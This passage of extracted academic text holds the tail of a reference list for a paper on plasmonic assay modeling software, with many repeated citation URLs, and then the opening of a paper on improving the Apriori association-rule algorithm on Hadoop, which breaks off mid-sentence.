36(31):8153–8158 DOI 10.1364/AO.36.008153. Malasi A, Kalyanaraman R, Garcia H. 2014. From Mie to Fresnel through effective medium approximation with multipole contributions. Journal of Optics 16(6):065001 DOI 10.1088/2040-8978/16/6/065001. Malinsky MD, Kelly KL, Schatz GC, Duyne RPV. 2001. Chain length dependence and sensing capabilities of the localized surface plasmon resonance of silver nanoparticles chemically modified with alkanethiol self-assembled monolayers. Journal of the American Chemical Society 123(7):1471–1482 DOI 10.1021/ja003312a. Mayer KM, Hafner JH, Antigen AA. 2011. Localized surface plasmon resonance sensors. Chemical Reviews 111(6):3828–3857 DOI 10.1021/cr100313v. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 20/23 https://peerj.com/computer-science/ http://dx.doi.org/10.1364/AO.45.008419 http://dx.doi.org/10.1021/jp062536y http://dx.doi.org/10.1063/1.3009205 http://dx.doi.org/10.1021/jp062004h http://arxiv.org/abs/1503.00815 http://dx.doi.org/10.1109/JSEN.2012.2210402 http://dx.doi.org/10.1016/j.bios.2009.03.010 http://dx.doi.org/10.1088/0022-3727/44/11/115402 http://dx.doi.org/10.1109/JSEN.2010.2057418 http://dx.doi.org/10.1364/AO.36.008153 http://dx.doi.org/10.1088/2040-8978/16/6/065001 http://dx.doi.org/10.1021/ja003312a http://dx.doi.org/10.1021/cr100313v http://dx.doi.org/10.7717/peerj-cs.17 Mayer KM, Lee S, Liao H, Rostro BC, Fuentes A, Scully PT, Nehl CL, Hafner JH. 2008. A label-free immunoassay based upon localized surface plasmon resonance of gold nanorods. ACS Nano 2(4):687–692 DOI 10.1021/nn7003734. McKinney W. 2010. Data structures for statistical computing in python. In: Van der Walt S, Millman J, eds. Proceedings of the 9th Python in science conference. 51–56. Mishra AK, Mishra SK, Gupta BD. 2015. SPR based fiber optic sensor for refractive index sensing with enhanced detection accuracy and figure of merit in visible region. Optics Communications 344:86–91 DOI 10.1016/j.optcom.2015.01.043. Mitsui K, Handa Y, Kajikawa K. 2004. Optical fiber affinity biosensor based on localized surface plasmon resonance. Applied Physics Letters 85(18):4231–4233 DOI 10.1063/1.1812583. Moharam MG, Pommet DA, Grann EB, Gaylord TK. 1995. Stable implementation of the rigorous coupled-wave analysis for surface-relief gratings: enhanced transmittance matrix approach. Journal of the Optical Society of America A 12(5):1077–1086 DOI 10.1364/JOSAA.12.001077. Moirangthem RS, Chang Y-C, Wei P-K. 2011. Ellipsometry study on gold-nanoparticle-coated gold thin film for biosensing application. Biomedical Optics Express 2(9):2569–2576 DOI 10.1364/BOE.2.002569. Myroshnychenko V, Rodrı́guez-Fernández J, Pastoriza-Santos I, Funston AM, Novo C, Mulvaney P, Liz-Marzán LM, Garcı́a de Abajo FJ. 2008. Modelling the optical response of gold nanoparticles. Chemical Society Reviews 37(9):1792–1805 DOI 10.1039/b711486a. Nath N, Chilkoti A. 2002. A colorimetric gold nanoparticle sensor to interrogate biomolecular interactions in real time on a surface. Analytical Chemistry 74(3):504–509 DOI 10.1021/ac015657x. Nikoobakht B, El-sayed MA. 2003. Preparation and growth mechanism of gold nanorods (NRs) using seed-mediated growth method. Chemistry of Materials 15(10):1957–1962 DOI 10.1021/cm020732l. NucleicDevelopmentTeam. 2013. Welcome to Enaml. Available at http://nucleic.github.io/enaml/ docs/. Nusz GJ, Curry AC, Marinakos SM, Wax A, Chilkoti A. 2009. Rational selection of gold nanorod geometry for label-free plasmonic biosensors. ACS Nano 3(4):795–806 DOI 10.1021/nn8006465. Oliphant TE. 2007. Python for scientific computing. Computing in Science & Engineering 9(3):10–20 DOI 10.1109/MCSE.2007.58. Optenso. 2014. Optenso: optical engineering software. Available at http://www.optenso.com/ contact/cprofile.html. Orfanidis S. 2008. Electromagnetic waves and antennas. New Jersey: ECE Rutgers. Pease LF, Tsai D-H, Hertz JL, Zangmeister RA, Zachariah MR, Tarlov MJ. 2010. Packing and size determination of colloidal nanoclusters. Langmuir: the ACS Journal of Surfaces and Colloids 26(13):11384–11390 DOI 10.1021/la100839t. Pei Z, Anderson H, Myrskog A, Dunér G, Ingemarsson B, Aastrup T. 2010. Optimizing immobilization on two-dimensional carboxyl surface: pH dependence of antibody orientation and antigen binding capacity. Analytical Biochemistry 398(2):161–168 DOI 10.1016/j.ab.2009.11.038. Pellegrini G, Mattei G. 2014. High-performance magneto-optic surface plasmon resonance sensor design: an optimization approach. Plasmonics 9(6):1457–1462 DOI 10.1007/s11468-014-9764-6. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 21/23 https://peerj.com/computer-science/ http://dx.doi.org/10.1021/nn7003734 http://dx.doi.org/10.1016/j.optcom.2015.01.043 http://dx.doi.org/10.1063/1.1812583 http://dx.doi.org/10.1364/JOSAA.12.001077 http://dx.doi.org/10.1364/BOE.2.002569 http://dx.doi.org/10.1039/b711486a http://dx.doi.org/10.1021/ac015657x http://dx.doi.org/10.1021/cm020732l http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://dx.doi.org/10.1021/nn8006465 http://dx.doi.org/10.1109/MCSE.2007.58 http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://dx.doi.org/10.1021/la100839t http://dx.doi.org/10.1016/j.ab.2009.11.038 http://dx.doi.org/10.1007/s11468-014-9764-6 http://dx.doi.org/10.7717/peerj-cs.17 Perez F, Granger B. 2007. IPython: a stystem for interactive scientific computing. Computing in Science and Engineering 9(3):21–29 DOI 10.1109/MCSE.2007.53. Pollard T D. 2010. A guide to simple and informative binding assays. Molecular Biology of the Cell 21(23):4061–4067 DOI 10.1091/mbc.E10-08-0683. Polyanskiy MN. 2015. Refractive index database. Available at http://refractiveindex.info. Punjabi NS, Mukherji S. 2014. Fabrication of out-of-plane multi-bend fiber-optic sensor for enhanced refractive index sensing. In: 12th international conference on fiber optics and photonics. 3:T3A.20. Quinten M. 2011. Optical properties of nanoparticle systems. first edition. Weinheim: KGaA, Wiley-VCH Verlag & Co. Rathgen H. 2008. mrcwa—Multilayer Rigorous Coupled Wave Analysis. Available at http://mrcwa. sourceforge.net/. Richard BM, Anna JT. 2008. Handbook of surface plasmon resonance. London: Royal Society of Chemistry. Rouard MP. 1937. Etudes des propriétés optiques des lames métalliques très minces. Annales de Physique (Paris) Series II 7:291–384. Sancho-Parramon J. 2011. Tuning the effective dielectric function of thin film metal–dielectric composites by controlling the deposition temperature. Journal of Nanophotonics 5(1):051805 DOI 10.1117/1.3590238. Sarid D, Challener W. 2010. Modern introduction to surface plasmons: theory, mathematica modeling and applications. first edition. Cambridge: Cambridge University Press. Sau TK, Rogach A L, Jäckel F, Klar TA, Feldmann J. 2010. Properties and applications of colloidal nonspherical noble metal nanoparticles. Advanced Materials 22(16):1805–1825 DOI 10.1002/adma.200902557. Scarpettini AF, Bragas AV. 2010. Coverage and aggregation of gold nanoparticles on silanized glasses. Langmuir 26(22):15948–15953 DOI 10.1021/la102937b. Schasfoort RBM, Lau WD, Kooi AVD, Clevers H, Engbers GHM. 2012. Method for estimating the single molecular affinity. Analytical Biochemistry 421(2):794–796 DOI 10.1016/j.ab.2011.12.011. Sciacca B, Monro TM. 2014. Dip biosensor based on localized surface plasmon resonance at the tip of an optical fiber. Langmuir: the ACS Journal of Surfaces and Colloids 30(3):946–954 DOI 10.1021/la403667q. Sharma A, Gupta BD. 2006. Fibre-optic sensor based on surface plasmon resonance with Ag–Au alloy nanoparticle films. Nanotechnology 124(17):124–141 DOI 10.1088/0957-4484/17/1/020. Sharma AK, Gupta BD. 2007. On the performance of different bimetallic combinations in surface plasmon resonance based fiber optic sensors. Journal of Applied Physics 101(9): 093111 DOI 10.1063/1.2721779. Shrivastav AM, Mishra SK, Gupta BD. 2015. Fiber optic SPR sensor for the detection of melamine using molecular imprinting. Sensors and Actuators B: Chemical 212:404–410 DOI 10.1016/j.snb.2015.02.028. Singh S, Verma RK, Gupta BD. 2010. LED based fiber optic surface plasmon resonance sensor. Optical and Quantum Electronics 42(1):15–28 DOI 10.1007/s11082-010-9418-7. Singh J, Whitten JE. 2008. Adsorption of 3-mercaptopropyltrimethoxysilane on silicon oxide surfaces and adsorbate interaction with thermally deposited gold. Journal of Physical Chemistry C 112(48):19088–19096 DOI 10.1021/jp807536z. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 22/23 https://peerj.com/computer-science/ http://dx.doi.org/10.1109/MCSE.2007.53 http://dx.doi.org/10.1091/mbc.E10-08-0683 http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://dx.doi.org/10.1117/1.3590238 http://dx.doi.org/10.1002/adma.200902557 http://dx.doi.org/10.1021/la102937b http://dx.doi.org/10.1016/j.ab.2011.12.011 http://dx.doi.org/10.1021/la403667q http://dx.doi.org/10.1088/0957-4484/17/1/020 http://dx.doi.org/10.1063/1.2721779 http://dx.doi.org/10.1016/j.snb.2015.02.028 http://dx.doi.org/10.1007/s11082-010-9418-7 http://dx.doi.org/10.1021/jp807536z http://dx.doi.org/10.7717/peerj-cs.17 Sopra SC. 2008. Optical data from sopra SA. Available at http://www.sspectra.com/sopra.html. Steed RJ. 2013. Transfer matrix theory for a type of uniaxial layers: from basic electromagnetism to quantum well intersubband transitions. Available at http://www.researchgate.net/publication/ 236491437. Sun Y, Xia Y. 2002. Increased sensitivity of surface plasmon resonance of gold nanoshells compared to that of gold solid colloids in response to environmental changes. Analytical Chemistry 74(20):5297–5305 DOI 10.1021/ac0258352. Tang L, Dong C, Ren J. 2010. Highly sensitive homogenous immunoassay of cancer biomarker using silver nanoparticles enhanced fluorescence correlation spectroscopy. Talanta 81(4-5):1560–1567 DOI 10.1016/j.talanta.2010.03.002. Trügler A. 2011. Optical properties of metallic nanoparticles. PhD thesis, Institut für Physik, Fachbereich Theoretische Physik Karl–Franzens–Universität Graz. Tsai D-H, Davila-Morris M, DelRio FW, Guha S, Zachariah MR, Hackley VA. 2011. Quantitative determination of competitive molecular adsorption on gold nanoparticles using attenuated total reflectance-Fourier transform infrared spectroscopy. Langmuir: the ACS Journal of Surfaces and Colloids 27(15):9302–9313 DOI 10.1021/la2005425. Tsang L, Kong JA, Shin RT. 1985. Theory of microwave remote sensing. New York: Wiley. Tsortos A, Papadakis G, Mitsakakis K, Melzak KA, Gizeli E. 2008. Quantitative determination of size and shape of surface-bound DNA using an acoustic wave sensor. Biophysical Journal 94(7):2706–2715 DOI 10.1529/biophysj.107.119271. Van de Hulst HC. 1981. Light scattering by small particles. Dover Books. Varoquaux G. 2010. Writing a graphical application for scientific programming using TraitsUI: a step-by-step guide for a non-programmer. Available at http://code.enthought.com/projects/traits/ docs/html/tutorials/traits ui scientific app.html. Wan M, Luo P, Jin J, Xing J, Wang Z, Wong STC. 2010. Fabrication of localized surface plasmon resonance fiber probes using ionic self-assembled gold nanoparticles. Sensors 10(7):6477–6487 DOI 10.3390/s100706477. Wilczewska AZ, Niemirowicz K, Markiewicz KH, Car H. 2012. Nanoparticles as drug delivery systems. Pharmacological Reports 64(5):1020–1037 DOI 10.1016/S1734-1140(12)70901-5. Willets KA, Van Duyne RP. 2007. Localized surface plasmon resonance spectroscopy and sensing. Annual Review of Physical Chemistry 58(October):267–297 DOI 10.1146/annurev.physchem.58.032806.104607. Wu B, Wang Q-K. 2009. Investigation of highly sensitive surface plasmon resonance biosensors with Au nanoparticles embedded dielectric film using rigorous coupled wave analysis. Optica Applicata 39(1):31–41. Yin G, Wang S-Y, Xu M, Chen L-Y. 2006. Theoretical calculation of the optical properties of gold nanoparticles. 49(5):2108–2111. Zakaria H, Shah A, Konieczny M, Hoffman J, Nijdam J, Reeves M. 2013. Small molecule and amino acid induced aggregation of gold nanoparticles. Langmuir 29(25):7661–7673 DOI 10.1021/la400582v. Zhdanov M. 2008. Generalized effective-medium theory of induced polarization. Geophysics 73(5):F197–F211 DOI 10.1190/1.2973462. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 23/23 https://peerj.com/computer-science/ http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://www.researchgate.net/publication/236491437 http://dx.doi.org/10.1021/ac0258352 http://dx.doi.org/10.1016/j.talanta.2010.03.002 http://dx.doi.org/10.1021/la2005425 http://dx.doi.org/10.1529/biophysj.107.119271 http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://dx.doi.org/10.3390/s100706477 http://dx.doi.org/10.1016/S1734-1140(12)70901-5 http://dx.doi.org/10.1146/annurev.physchem.58.032806.104607 http://dx.doi.org/10.1021/la400582v http://dx.doi.org/10.1190/1.2973462 http://dx.doi.org/10.7717/peerj-cs.17 PAME: plasmonic assay modeling environment Introduction Theory and Design Substrate types Multilayer stack PAME material classes Simulation and data analysis Examples of Use Case 1: refractometer Case 2: multiplexed Ag--Au sensor Implementation and Performance Future Improvements Conclusion About Acknowledgements References work_k4dphi7rgzgifgf4jv7luea7gu ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-012 100 Research and Improvement of Apriori Algorithm Based on Hadoop Gao Pengfei a , Wang Jianguo b and Liu Pengcheng c School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, Shaanxi Province, China a gaopf1225@gmail.com, b wjg_xit@126.com, c 294843945@qq.com Abstract—Association rules can forcefully get a horizontal relation in the big data, the Apriori algorithm is one of the most significant association rules. Traditional mining based on parallel Apriori algorithms needs much more time in data IO with the increasing size of large transaction database. This paper improves the Apriori algorithm from compressing transactions, reducing the number of scans and simplifying candidate set generation. And then the improved algorithm is parallelized on the Hadoop framework. The experiments show that this improved algorithm is suitable for large-scale data mining and has good scalability and effectiveness. Keywords-Apriori algorithm; Hadoop; Association rules I. INTRODUCTION In the context of the development of big data “spraying wells”, there is frequently a close relationship between vast amounts of data[1]. Analysis and decision making through data mining have become the mainstream of social development. In order to better find the relevance of transaction data sets, some researchers have discovered the concept of association rule mining technology[2]. With the attention of many researchers at home and abroad caused by the conception of the concept, they have done a lot of analysis in this field and put forward many data mining algorithms. One of the most famous association rule algorithms is the Apriori algorithm, which is a classic association rule algorithm designed by Agrawal[3-4] in 1994. It is a level-by-level search iteration method that constructs a k-item set to constitute a k+1-item set. The main ideas of this algorithm are: Firstly, all frequency sets are counted from the transaction database, and the support of this frequent set must not be less than the minimum support degree; Secondly it enters into the process of strong association rule generation, and the rules need to satisfy the support and confidence thresholds at the same time; Thirdly, only all rules that contain collection items are retained. Once these rules are retained and generated, that are greater than or equal to the MinConfidence. The design of the Hadoop[5] framework originated was from an open source project developed by the Apache organization Foundation. Because of its inter-temporal significance, the Hadoop framework has been widely used in the information field at home and abroad. There are two important modules in the Hadoop frame--Distributed File System HDFS and Distributed Computing Frame MapReduce[6]. As a distributed file system , HDFS functions aims to implement data storage. It will work in conjunction with the computational framework. MapReduce works to provide the underlying support for data calculations; And the idea of MapReduce[6-7] is based on a paper by Google. In short, its core method is "the decomposition of tasks and the statute of results." II. BRIEF AND RESEARCH STATUS OF APRIORI ALGORITHM A. Overview of Apriori algorithm The Apriori algorithm is a level-by-level search iterative method that consists of a k-item set to construct a (k+1)-item set. First, obtain a frequent 1-item set. L1 can generate a frequent 2-item set L2, and L2 can generate a frequent 3-item set L3. According to this rule, when a frequent k-item International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 101 set cannot be found, the algorithm ends[8-9]. The specific operation is as follows: 1) Iterate through the initial transaction database and count the frequency of occurrence of the candidate set. The result is the support of the project. All projects whose all supports level no lower than the preset threshold generate a frequent 1-item set L1. 2) The algorithm uses L1 JOIN L1 to form a candidate C2-item set C2. 3) Using the items in C2, traverse the database again to obtain the support degree of each candidate set. All projects with support levels not lower than the support level generate frequent 